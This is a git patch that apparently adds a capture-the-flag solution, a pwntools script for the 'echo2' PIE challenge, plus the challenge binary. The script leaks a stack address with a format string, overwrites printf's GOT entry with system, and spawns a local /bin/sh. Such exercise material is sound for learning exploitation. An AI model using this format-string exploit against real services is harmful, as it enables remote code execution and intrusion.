From e06705161d61b76cdd31bc21bf1a1302c0a5c761 Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Tue, 14 Sep 2021 16:11:29 +0800
Subject: [PATCH] Finished PIE/echo2

---
 PIE/echo2/answer.py |  24 ++++++++++++++++++++++++
 PIE/echo2/echo2     | Bin 0 -> 9024 bytes
 2 files changed, 24 insertions(+)
 create mode 100755 PIE/echo2/answer.py
 create mode 100755 PIE/echo2/echo2

diff --git a/PIE/echo2/answer.py b/PIE/echo2/answer.py
new file mode 100755
index 0000000..f0728fb
--- /dev/null
+++ b/PIE/echo2/answer.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./echo2')
+elf = ELF('./echo2')
+
+query_payload = "%41$lld"
+p.sendline(query_payload)
+echo_ret_addr = int(p.recvuntil("\n"))
+program_base = echo_ret_addr - 0xa03
+
+printf_got = elf.got['printf'] + program_base
+system_plt = elf.plt['system'] + program_base
+
+payload = fmtstr_payload(6, {printf_got: system_plt})
+
+p.sendline(payload)
+p.sendline("/bin/sh")
+p.interactive()
+
diff --git a/PIE/echo2/echo2 b/PIE/echo2/echo2
new file mode 100755
index 0000000000000000000000000000000000000000..46b7ec0d65fe92b15b2dc43975eb88cb219e9848
GIT binary patch
literal 9024
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

literal 0
HcmV?d00001